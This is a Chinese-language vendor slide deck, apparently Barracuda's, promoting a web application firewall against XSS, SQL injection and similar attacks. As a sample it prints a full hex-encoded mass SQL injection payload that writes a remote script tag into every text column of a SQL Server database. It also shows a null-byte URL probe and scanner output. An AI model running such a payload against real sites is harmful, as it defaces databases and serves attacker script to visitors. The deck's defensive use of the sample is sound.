保护企业网站安全 WEB应用安全防护技术,Web网站应用的特点,客户，员工，合作伙伴间互动更多 工作系统的英特网化 关键业务流程和数据在英特网上的暴露 协议和架构的标准化也带来更多的安全问题,web应用安全问题不断增长,应用安全，数据安全不断增长,传统安全问题 如病毒、垃圾邮件 等不断递减,您是否有如下担心？,网站被攻击 网站被篡改 被OWASP 列举的前十位的攻击攻破 数据被窃取 怎么才能阻止下列攻击： 跨站脚本攻击(XSS) SQL 注入 Cookie 篡改 缓存溢出 网站需要达到PCI标准,现有安全措施无能为力,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,防火墙,数据中心,局域网,防火墙只能阻断网络层的攻击,入侵监测系统,80端口web流量仍然能够通过,最终用户,Web 应用,对已知漏洞的防护延迟,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,Database Servers Customer Info Business Data Transaction Info,机密数据,一成不变的低效的“消防演习”模式 补丁总是不够及时而且容易出错 基于指纹的防护措施 对于“零日攻击”毫无办法,Web应用防护和IPS的区别,IPS设备是基于指纹识别的安全系统 通过将数据包和数据库中攻击指纹的比较来判断是否为恶意攻击 通常从被动的IDS技术进化而来。 基于特征的 针对典型攻击技术的报警和阻断 使用“允许除非明确否认”模式 目的是保护广泛的一段网络协议和环境，而不是侧重保护web应用,IPS对Web攻击防护的不足,IPS只能捕获已知攻击 黑客少许修改，现有的特征库将不起作用。 SSL加密使IPS设备对所有的web攻击失效。 IPS不能对URL和Unicode编码流量规范化。碎片攻击等将使IPS失去作用。 IPS只知道包和请求，而不知道网络和应用。无法根据实际应用做客户化防护。,Tom & Jerry,Web应用防护和IPS的区别,可怜的老板,聪明的小偷,伪装一下,轻松搞定,奇怪? 老鼠不应该带帽子的，不符合Jerry老鼠的特征，允许通行,Jerry,A,B,C,两个耳朵 一条尾巴 身高15cm,特征库,嘿嘿，又来了，真实只笨猫,老鼠就是老鼠，穿什么衣服，禁止入内,最新老鼠识别器，我看行,老鼠,老虎,大象,猫,老鼠骨骼特征 老鼠DNA分析,资料库,Barracuda Networks Confidential,13,WEB应用安全防护技术,全面的WEB站点防护，降低商业风险 各种攻击 非法访问 WEB站点伪装 WEB站点篡改 Outbound 数据窃取防护 应用传输加速 缓存 、压缩、TCP连接复用、SSL卸载和加速、负载均衡 审计及合规 - 帮助企业通过安全审计 - 达到PCI (支付卡) 应用安全规范要求 - 美国萨班法案(Sarbanes Oxley)及其他合规性要求,厂商/咨询顾问的解决方案 作为RFI/RFP模版,需求 6.5: 开发安全的应用程序 需求 6.6: 审核应用安全安全性 选择 1: 专业公司进行代码审核 选择 2: 部署应用防火墙,哪里需要我们,Business Critical Applications,NetContinuum Web Security Gateway,Application D,Application E,Supply Chain App Servers,FTP Servers,Inventory Servers,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,用户,Web应用,TCP进程代理(TCP Session Full Proxy) Net防火墙 NAT, ACL, PAT 进程维护(Normalize Session) 协议遵从(Protocol Compliance) SSL加密解密 HTTP信头重写 URL翻译,网站隐藏, 防爬行, Web地址转换 AAA 应用防DoS SQL/命令注入 DAP (Global and Session) URL ACLs Forms及Cookie窃取 REGEX保护,TCP Pooling 缓存, GZIP压缩 SSL卸载, 重新加密 应用及服务器健康检查 内容交换(Content Switching) 负载均衡 记录、监控、报告,终止,安全,加速,反向代理,保护应用基础架构 隐藏 Cookie 安全 Web 地址转换 根据应用强化安全 动态应用建模 弹性安全策略 颗粒度极小，可高度自定义的Web 访问控制列表,三步实现应用安全,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,1,终止所有流量，我们就可以管理它。,tcp,ssl,严格意义上来说，这是“反向代理”。,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,部署,2,在边界对用户进行验证,LDAP,RADIUS,Client Certificates,Source IP,HTTP Auth,CA SiteMinder,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,安全,3,标准化数据,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,安全,4,检查流量是否为恶意攻击,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,安全,企业网站结构,Operating Systems,Operating Systems,Operating Systems,Network Firewall,http :/www.none.to/script ?submenu=update-%00,Web Servers Presentation Layer,Database Servers Customer Info Business Data Transaction Info,App Servers Business Logic J2EE/.NET Legacy Apps,Apache,Linux Solaris AIX Windows,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,web应用防火墙如何工作？,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,用户,对应用数据录入完整检查 完全掌握应有数据值类型 实时策略生成及执行,请求限制,请求限制主要是对请求中的报头信息进行参数长度的限制，阻断超出限制范围的请求，保证免遭缓冲溢出等恶意攻击。,SQL注入的一个实例,;DECLARE%20S%20CHAR(4000);SET%20S=CAST(0x4445434C4152452040542076617263686 17228323535292C404320766172636861722832353529204445434C415245205461626C655F4 37572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652 066726F6D207379736F626A6563747320612C737973636F6C756D6E732062207768657265206 12E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653 D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E7 8747970653D31363729204F50454E205461626C655F437572736F72204645544348204E45585 42046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C45284 04046455443485F5354415455533D302920424547494E20657865632827757064617465205B2 72B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287661726 36861722C5B272B40432B275D29292B2727223E3C2F7469746C653E3C7363726970742073726 33D22687474703A2F2F6A732E75736572732E35312E6C612F313938313136322E6A73223E3C2 F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272 725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7573657 2732E35312E6C612F313938313136322E6A73223E3C2F7363726970743E3C212D2D272727294 645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546 1626C655F437572736F72%20AS%20CHAR (4000);EXEC(S),输入验证引擎侦测并阻断攻击 SQL 注入 跨站点脚本攻击 命令攻击 非法字符集 排除关键字 偷窃命令 参数访问控制列表 强化对表单字段和其他应用参数的安全策略 报头访问控制列表 强化对标准和自定义HTTP报头的安全策略 阻断隐藏在报头值中的攻击,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,输入验证,Cookie 加密保证会话的完整性 维护客户端会话完整性 保证用户信息的安全 Cookie 加密提供私密性 数字证书提供可靠性 对用户和应用完全透明,2008 博威特网络技术（上海）有限公司。版权所有，不得转载。www.barracudanetworks.com.cn,会话完整,站点信息隐藏,PROBLEM Easy to discover a gold mine of clues about app environment,黑客,Whisker scanning http:/www.xyz.com Servers: Microsoft IIS 4.0 Windows 2000 SP2 FrontPage/5.0.2.2623 Vulnerable URL : cgi-bin/code.php3 Vulnerable URL : cgi-bin/admin.php3,